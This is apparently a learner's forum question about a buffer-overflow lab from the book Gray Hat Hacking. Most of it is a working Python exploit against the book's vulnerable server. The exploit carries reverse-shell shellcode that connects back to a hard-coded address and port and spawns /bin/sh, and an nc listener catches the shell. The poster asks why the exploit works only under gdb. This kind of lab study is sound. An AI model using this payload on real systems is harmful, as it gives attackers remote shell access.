From Gray Hat Hacking (4th edition), page 233, section 10.4.5 "Verifying the exploit". My code is as follows:
A side, terminal_1:
exploit.py:
#!/usr/bin/python
import socket
total = 1024
off = 264
sc = ""
sc += "\x31\xc0" #xor %eax,%eax
sc += "\x31\xdb" #xor %ebx,%ebx
sc += "\x31\xd2" #xor %edx,%edx
sc += "\x50" #push %eax
sc += "\x6a\x01" #push $0x1
sc += "\x6a\x02" #push $0x2
sc += "\x89\xe1" #mov %esp,%ecx
sc += "\xfe\xc3" #inc %bl
sc += "\xb0\x66" #mov $0x66,%al
sc += "\xcd\x80" #int $0x80
sc += "\x89\xc6" #mov %eax,%esi
sc += "\x52" #push %edx
sc += "\x68\x65\x66\x67\x67" #push $0x67676665
sc += "\x66\x68\xbb\xbb" #pushw $0xbbbb
sc += "\x31\xc9" #xor %ecx,%ecx
sc += "\xb1\x02" #mov $0x2,%cl
sc += "\x66\x51" #push %cx
sc += "\x89\xe1" #mov %esp,%ecx
sc += "\x6a\x10" #push $0x10
sc += "\x51" #push %ecx
sc += "\x56" #push %esi
sc += "\x89\xe1" #mov %esp,%ecx
sc += "\xb3\x03" #mov $0x3,%bl
sc += "\x31\xc0" #xor %eax,%eax
sc += "\xb0\x66" #mov $0x66,%al
sc += "\xcd\x80" #int $0x80
sc += "\x89\xf3" #mov %esi,%ebx
sc += "\x31\xc9" #xor %ecx,%ecx
sc += "\x31\xc0" #xor %eax,%eax
sc += "\xb0\x3f" #mov $0x3f,%al
sc += "\xcd\x80" #int $0x80
sc += "\x41" #inc %ecx
sc += "\x31\xc0" #xor %eax,%eax
sc += "\xb0\x3f" #mov $0x3f,%al
sc += "\xcd\x80" #int $0x80
sc += "\x41" #inc %ecx
sc += "\x31\xc0" #xor %eax,%eax
sc += "\xb0\x3f" #mov $0x3f,%al
sc += "\xcd\x80" #int $0x80
sc += "\x52" #push %edx
sc += "\x68\x2f\x2f\x73\x68" #push $0x68732f2f
sc += "\x68\x2f\x62\x69\x6e" #push $0x6e69622f
sc += "\x89\xe3" #mov %esp,%ebx
sc += "\x52" #push %edx
sc += "\x53" #push %ebx
sc += "\x89\xe1" #mov %esp,%ecx
sc += "\x31\xc0" #xor %eax,%eax
sc += "\xb0\x0b" #mov $0xb,%al
sc += "\xcd\x80" #int $0x80
noplen = 32
jmp = "\x18\xf2\xff\xbf"
s = socket.socket()
s.connect(("localhost", 5555))
print s.recv(1024)
exploit = ""
exploit += "A"*off + jmp + "\x90"*noplen + sc
exploit += "C"*(total-off-4-len(sc)-noplen)
s.send(exploit)
s.close()
B side, terminal_1:
> ./ch10_6
B side, terminal_2:
> ./nc -nlvv 48059
Notes:
1. Side A is the target; exploit.py is stored there. When run, it makes a reverse connection to side B's terminal_1, i.e. it connects to port 5555 of ch10_6.
2. exploit.py uses the buffer overflow to jump to the sc code (the shellcode block above), which then connects to side B's terminal_2, i.e. nc -nlvv 48059.
3. In the end, a shell is obtained in side B's terminal_2, and any shell command entered there returns the corresponding information from side A.
Debugging attempt 1:
1. On side B, open two terminals:
B_terminal_1 > ./ch10_6
B_terminal_2 > nc -nlvv 48059
2. On side A, open one terminal:
A_terminal_1 > ./exploit.py
Result:
Whatever I type in side B's terminal_2, no output from side A appears at all (failed)
Debugging attempt 2:
1. On side B, open two terminals:
B_terminal_1 > gdb -q ch10_6
> set follow-fork-mode child
> run
B_terminal_2 > nc -nlvv 48059
2. On side A, open one terminal:
A_terminal_1 > ./exploit.py
Result:
Any shell command entered in side B's terminal_2 returns the corresponding information from side A (success)
So the problem clearly lies in running ch10_6 directly. How can I get the effect of "set follow-fork-mode child" without using gdb?
Additional notes:
1. For the sc code in exploit.py (the shellcode block), I did not use the code from section 10.4.5 of the book directly, but rather the reverse-connect code from chapter 7 of the book (with some modifications). That does not affect things, though.
2. The ch10_6 program is attached:
ch10_6.zip